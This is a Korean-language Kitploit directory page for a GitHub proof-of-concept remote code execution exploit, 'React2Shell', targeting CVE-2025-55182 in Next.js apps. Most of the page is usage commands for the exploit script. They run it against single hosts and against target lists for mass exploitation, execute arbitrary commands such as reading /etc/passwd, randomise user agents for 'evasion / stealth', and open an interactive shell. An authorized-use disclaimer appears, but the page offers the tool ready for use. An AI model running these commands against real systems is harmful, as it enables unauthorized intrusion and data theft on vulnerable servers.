Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182-React2Shell-RCE-Shell — CVE-2025-55182 – React2Shell: Next.js 앱을 위한 개념 증명(Proof-of-Concept) 원격 코드 실행(RCE) 익스플로잇입니다. 취약점을 실시간으로 테스트하고 시연할 수 있는 대화형 셸 프롬프트를 제공합니다. 보안 연구 및 승인된 침투 테스트에만 사용하십시오. | Kitploit
도구/GitHubGitHub/m4xsec/cve-2025-55182-react2shell-rce-shell
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubm4xsec/cve-2025-55182-react2shell-rce-shell

CVE-2025-55182-React2Shell-RCE-Shell

CVE-2025-55182 – React2Shell: Next.js 앱을 위한 개념 증명(Proof-of-Concept) 원격 코드 실행(RCE) 익스플로잇입니다. 취약점을 실시간으로 테스트하고 시연할 수 있는 대화형 셸 프롬프트를 제공합니다. 보안 연구 및 승인된 침투 테스트에만 사용하십시오.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
818개월 전아직 검토되지 않음

‼️ CVE-2025-55182 Pwn React2Shell RCE 익스플로잇 - 대화형 셸 프롬프트 및 대량 익스플로잇 지원

이 저장소는 Next.js 일부 배포 환경에 영향을 주는 RCE 취약점인 CVE-2025-55182에 대한 작동하는 개념 증명(PoC)을 제공합니다. 이 도구는 익스플로잇 성공 시 대화형 셸 프롬프트를 열어 보안 연구자들이 취약점의 실현 가능성을 테스트하고 검증할 수 있게 합니다. 책임감 있게, 승인된 대상에 대해서만 사용하십시오.

poc

🕸️ 사용법:

root@kitploit:~
# Getting Started
git clone https://github.com/M4xSec/CVE-2025-55182-React2Shell-RCE-Shell/
cd /CVE-2025-55182-React2Shell-RCE-Shell/
python3 CVE-2025-55182-exploit.py 

# Single target (default mode)
python3 CVE-2025-55182-exploit.py -u http://target.com

# Target on localhost + specify callback / proxy URL (if applicable)
python3 CVE-2025-55182-exploit.py -u http://localhost:3000 -p http://127.0.0.1:8080

# Use HTTPS target and skip certificate verification (if applicable)
python3 CVE-2025-55182-exploit.py -u https://target.com -k

# Batch mode: supply list of targets (one per line)
python3 CVE-2025-55182-exploit.py -l targets.txt

# Custom command execution on target
python3 CVE-2025-55182-exploit.py -u http://target.com --custom "id"

python3 CVE-2025-55182-exploit.py -u http://target.com --custom "cat /etc/passwd"

python3 CVE-2025-55182-exploit.py -u http://target.com --custom "uname -a" -v

# Provide additional headers if needed (e.g. custom cookies)
python3 CVE-2025-55182-exploit.py -u http://target.com -H "Cookie: session=abc123" --custom "ps aux"

# Batch + custom commands (multiple commands separated with semicolon)
python3 CVE-2025-55182-exploit.py -l targets.txt --custom "whoami; id; pwd"

# Only output the payload without executing (payload-only mode)
python3 CVE-2025-55182-exploit.py -u http://target.com --custom "cat /etc/passwd" --payload-only

# Use a random User-Agent header for evasion / stealth
python3 CVE-2025-55182-exploit.py -u http://target.com --random-agent

python3 CVE-2025-55182-exploit.py -l targets.txt --random-agent -k

# Interactive shell mode (if exploit succeeds)
python3 CVE-2025-55182-exploit.py -u http://target.com --shell
도구 다운로드